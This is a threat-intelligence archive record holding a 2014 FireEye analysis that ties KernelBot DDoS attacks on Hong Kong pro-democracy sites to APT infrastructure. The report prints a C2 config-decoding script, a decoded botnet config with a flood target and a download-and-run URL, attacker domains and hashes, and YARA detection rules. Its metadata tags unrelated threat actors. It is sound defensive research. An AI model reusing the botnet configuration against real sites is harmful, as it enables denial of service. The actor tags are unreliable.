{
	"id": "55c680d4-0f93-4c4d-bf9a-74164c598a15",
	"created_at": "2026-04-06T00:07:56.087069Z",
	"updated_at": "2026-04-10T03:35:29.215609Z",
	"deleted_at": null,
	"sha1_hash": "89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c",
	"title": "Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 148316,
	"plain_text": "Operation Poisoned Handover: Unveiling Ties Between APT\r\nActivity in Hong Kong’s Pro-Democracy Movement\r\nBy Ned Moran, Mike Scott, Mike Oppenheim | Threat Intelligence\r\nPublished: 2014-11-03 · Archived: 2026-04-05 23:35:04 UTC\r\nThreat Research | November 03, 2014\r\nAs the pro-democracy movement in Hong Kong has continued, we’ve been watching for indications of confrontation taking place in cyberspace. Protests began in September and have continued to escalate.\r\nIn recent weeks, attackers have launched a series of distributed denial of service (DDoS) attacks against websites promoting democracy in Hong Kong. According to the Wall Street Journal, websites belonging to Next Media’s Apple Daily publication have suffered from an ongoing DDoS attack that “brought down its email system for hours”. According to other reports, Next Media’s network has suffered a “total failure” as a result of these attacks. Additionally, at least one member of the popular online forum HKGolden was arrested for posting messages encouraging support for the Occupy Central pro-democracy movement.\r\nThe use of DDoS attacks as a political tool during times of conflict is not new; patriotic hacktivist groups frequently use them as a means to stifle political activity of which they disapprove. The question of state sponsorship (or at least tacit approval) in online crackdowns is often up for debate and ambiguous from a technical evidence and tradecraft perspective.\r\nIn this case, however, we’ve discovered an overlap in the tools and infrastructure used by China-based advanced persistent threat (APT) actors and the DDoS attack activity. We believe that these DDoS attacks are linked to previously observed APT activity, including Operation Poisoned Hurricane. 
This correlation sheds light on the potential relationships, symbiosis and tool sharing between patriotic hacker activities designed to disrupt anti-government activists in China, and the APT activity we consistently see that is more IP theft and espionage-focused.\r\nOngoing DDoS Attacks Target the Pro-Democracy Movement\r\nFireEye has identified a number of binaries coded to receive instructions from a set of command and control (C2) servers instructing participating bots to attack Next Media-owned websites and the HKGolden forum. Next Media is a large media company in Hong Kong and the HKGolden forum has been used as a platform to organize pro-democracy protests. Each sample we identified is signed with digital certificates that have also been used by APT actors to sign binaries in previous intrusion operations:\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 1 of 18\r\nThese binaries are W32 Cabinet self-extracting files that drop a variant of an older DDoS tool known as KernelBot. All of the samples we identified have the “NewVersion” value of 20140926. Structurally, all of these samples are similar in that they drop three files:\r\n• ctfmon.exe - a legitimate, signed copy of the Pidgin IM client (MD5 hash 1685f978149d7ba8e039af9a4d5803c7)\r\n• libssp-0.dll - a malware DLL which is side-loaded by ctfmon.exe to decode and launch KernelBot. Most versions of this DLL are also signed by either the QTI or CallTogether certificate.\r\n• readme.txt - a binary file which contains the XOR-encoded KernelBot DLL as well as C2 destination information (most have MD5 hash b5ac964a74091d54e091e68cecd5b532)\r\nThe KernelBot implants receive targeting instructions from C2 servers hard-coded directly into the sample. 
For example, c3d6450075d618b1edba17ee723eb3ca drops a KernelBot variant that connects to both www.sapporo-digital-photoclub[.]com and wakayamasatei[.]com. The full list of C2 servers we identified is as follows:\r\nOn Oct. 21, the control server at wakayamasatei[.]com responded with the following encoded configuration file:\r\nThis configuration file can be decoded by stripping the leading and trailing @$@ characters. At this point, a simple base64 and XOR decode will reveal the plaintext configuration. 
The following snippet of Python code can be used to decode this command:\r\nimport base64\r\n\r\ndef decode_config(content, xor_key):\r\n    # Strip the @$@ framing, base64-decode, then XOR every byte with the\r\n    # single-byte key (0x2A or 0x7E in this campaign) to recover the INI text.\r\n    b64encoded = content.strip('@$@')\r\n    b64encoded += '=' * (-len(b64encoded) % 4)  # pad in case the server omits trailing '='\r\n    b64decoded = base64.b64decode(b64encoded)\r\n    command = ''\r\n    for c in b64decoded:\r\n        command += chr(c ^ xor_key)\r\n    return command\r\nFireEye has observed two different single-byte XOR keys used to encode configuration files issued by the DDoS C2 servers in this campaign. The two keys are 0x2A and 0x7E. The encoded configuration file retrieved on Oct. 21 decodes to:\r\n[KernelSetting]\r\nIsReportState=0\r\nIsDownFileRun0=0\r\nCmdID0=1\r\nDownFileRunUrl0=http://10.0.1.151/1.exe\r\n[UpdateServer]\r\nNewVersion=20140926\r\nUpdateFileUrl=http://10.0.1.151/1.exe\r\n[DDOS_HostStatistics]\r\nCountUrl=\r\nTimer=2\r\n[DDOS_ScriptFlood]\r\nIsScriptFlood=1\r\nCmdID=123\r\nScriptFloodDNS=\r\nScriptFloodUrl=http://nxapi.appledaily.com.hk/\r\nScriptFloodPort=80\r\nIsGetUrlFile=1\r\nIsSendPacket=0\r\nThreadLoopTime=5\r\nThreadCount=10\r\nTimer=360\r\nIsTimer=1\r\n[DDOS_ScriptFlood_A1]\r\nIsScriptFlood=0\r\nCmdID=1\r\nScriptFloodDNS=10.0.1.151\r\nScriptFloodUrl=10.0.1.151/1.html\r\nScriptFloodPort=80\r\nIsGetUrlFile=1\r\nIsSendPacket=1\r\nThreadLoopTime=1\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_UdpFlood]\r\nIsUdpFlood=0\r\nCmdID=1\r\nUdpFloodDNS=10.0.1.151\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_UdpFlood_A1]\r\nIsUdpFlood=0\r\nCmdID=1\r\nUdpFloodDNS=10.0.1.151\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_SynFlood]\r\nIsSynFlood=0\r\nCmdID=1\r\nSynFloodDNS=10.0.1.151\r\nSynFloodPort=80\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_TcpFlood]\r\nIsTcpFlood=0\r\nCmdID=1\r\nTcpFloodDNS=10.0.1.151\r\nTcpFloodPort=80\r\nIsSendPacket=1\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_TcpFlood_A1]\r\nIsTcpFlood=0\r\nCmdID=1\r\nTcpFloodDNS=10.0.1.151\r\nTcpFloodPort=80\r\nIsSendPacket=1\r\nThreadCount=6\r\nTimer=20\r\nIsTimer=1\r\nDuring the course of our research, we’ve observed more than 30 unique configuration files issued by the C2 servers listed above. 
These configurations issued commands to attack the following domains and IPs:\r\nAll of the targeted IPs host Next Media or Apple Daily websites, with the exception of 58.64.139.10 and 124.217.214.149. The IP 58.64.139.10 has hosted hkgolden[.]com - the domain for the HKGolden forum mentioned above.\r\nFor approximately 14 hours between October 23rd and 24th, the attackers pushed a configuration update to four control servers that instructed bots under their control to flood 124.217.214.149 with UDP traffic. The IP 124.217.214.149 hosted the attacker-controlled domain p.java-sec[.]com.\r\nOn Oct. 23, 2014, two of the active control servers began instructing participating bots to cease attacks. By Oct. 24, 2014, all five of the known active control servers were issuing commands to cease the attacks.\r\nIt should come as no surprise that the hkgolden[.]com, nextmedia[.]com, and appledaily.com[.]hk websites are now or previously have been blocked by the Great Firewall of China – indicating that the PRC has found the content hosted on these sites objectionable.\r\nLinks to Previous Activity\r\nThe most direct connection between these DDoS attacks and previous APT activity is the use of the QTI International and CallTogether code signing certificates, which we have seen in malware attributed to APT activity.\r\nThe QTI International digital certificate has been previously used to sign binaries used in APT activity including Operation Poisoned Hurricane. 
Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX variant signed by the QTI International certificate. This PlugX variant connected to a Google Code project at code.google[.]com/p/udom/, where it decoded a command that configured its C2 server.\r\nThe sample 0b54ae49fd5a841970b98a078968cb6b was signed with the QTI International certificate as well. This sample was first observed during a drive-by attack in June 2014, and was downloaded from java-se[.]com/jp.jpg. This sample is detected as Backdoor.APT.Preshin and connected to luxscena[.]com for C2.\r\nThe QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect this payload as Backdoor.APT.PISCES and it used hk.java-se[.]com for C2. The java-se[.]com website was previously used in other attacks targeting the pro-democracy movement in Hong Kong. We first observed the presence of malicious JavaScript inserted into the website of the Hong Kong Association for Democracy and People's Livelihood (www.adpl.org.hk) on June 26, 2014, which appeared as the following:\r\nMore recently, as noted by Claudio Guarnieri, the website of the Democratic Party of Hong Kong was seen hosting a redirect to the same malicious JavaScript. The CallTogether certificate has been used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect this payload as Backdoor.APT.PISCES and observed it connect to u.java-se[.]com. Both of these certificates are valid but can be detected and blocked via the following Yara signatures:\r\nrule callTogether_certificate\r\n{\r\n meta:\r\n author = \"Fireeye Labs\"\r\n version = \"1.0\"\r\n reference_hash = \"d08e038d318b94764d199d7a85047637\"\r\n description = \"detects binaries signed with the CallTogether certificate\"\r\n strings:\r\n $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C }\r\n $o = \"CallTogether, Inc.\"\r\n condition:\r\n $serial and $o\r\n}\r\nrule qti_certificate\r\n{\r\n meta:\r\n author = \"Fireeye Labs\"\r\n reference_hash = \"cfa3e3471430a0096a4e7ea2e3da6195\"\r\n description = \"detects binaries signed with the QTI International Inc certificate\"\r\n strings:\r\n $cn = \"QTI International Inc\"\r\n $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }\r\n condition:\r\n $cn and $serial\r\n}\r\nThese ongoing DDoS attacks and previous APT intrusion activity both target the hkgolden[.]com website. As noted above, this site has been targeted with a DDoS attack by a KernelBot network. We also found that the hkgolden[.]com website was compromised on Sept. 5, 2014 and had a redirect to malicious JavaScript again hosted at another java-se[.]com host.\r\nFinally, as noted above, the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between Oct. 25, 2014 and Oct. 27, 2014. 
As Brandon Dixon noted, the java-sec[.]com domain is linked to java-se[.]com by shared hosting history at the following IP addresses:\r\n124.248.237.26\r\n223.29.248.9\r\n211.233.89.182\r\n112.175.143.2\r\n112.175.143.9\r\nIt is unclear why these actors would attack an IP address they were actively using. It’s possible that the attackers wanted to test their botnet’s capability by attacking an IP they were using to gather statistics on the size of the attack. It is also possible that the attackers simply made a mistake and accidentally issued commands to attack their own infrastructure. On Oct. 24, 2014, after attacking their own infrastructure, the attackers issued new instructions to their botnet that ceased all attacks.\r\nConclusion\r\nWhile not conclusive, the evidence presented above shows a link between confirmed APT activity and ongoing DDoS attacks that appear to be designed to silence the pro-democracy movement in Hong Kong. The evidence does not conclusively prove that the same actors responsible for the DDoS attacks are also behind the observed intrusion activity discussed above – such as Operation Poisoned Hurricane. Rather, the evidence may indicate that a common quartermaster supports both the DDoS attacks and ongoing intrusion activity.\r\nIn either scenario, there is a clear connection between the intrusion activity documented in Operation Poisoned Hurricane and the DDoS attacks documented here. While the tactics of these activities are very different from a technical perspective, each supports distinct political objectives. Operation Poisoned Hurricane’s objective appeared to have in part been IP theft, possibly for economic gain or other competitive advantages. 
In the DDoS attacks, the objective was to silence free speech and suppress the pro-democracy movement in Hong Kong. The Chinese government is the entity most likely to be interested in achieving both of these objectives.\r\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
	],
	"report_names": [
		"operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "722b693d-cfdc-489e-a540-78c7d52ac5a8",
			"created_at": "2022-10-25T16:07:23.713768Z",
			"updated_at": "2026-04-10T02:00:04.7232Z",
			"deleted_at": null,
			"main_name": "Hurricane Panda",
			"aliases": [
				"Operation Poisoned Hurricane"
			],
			"source_name": "ETDA:Hurricane Panda",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"Mimikatz",
				"SinoChopper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775792129,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.pdf",
		"text": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.txt",
		"img": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.jpg"
	}
}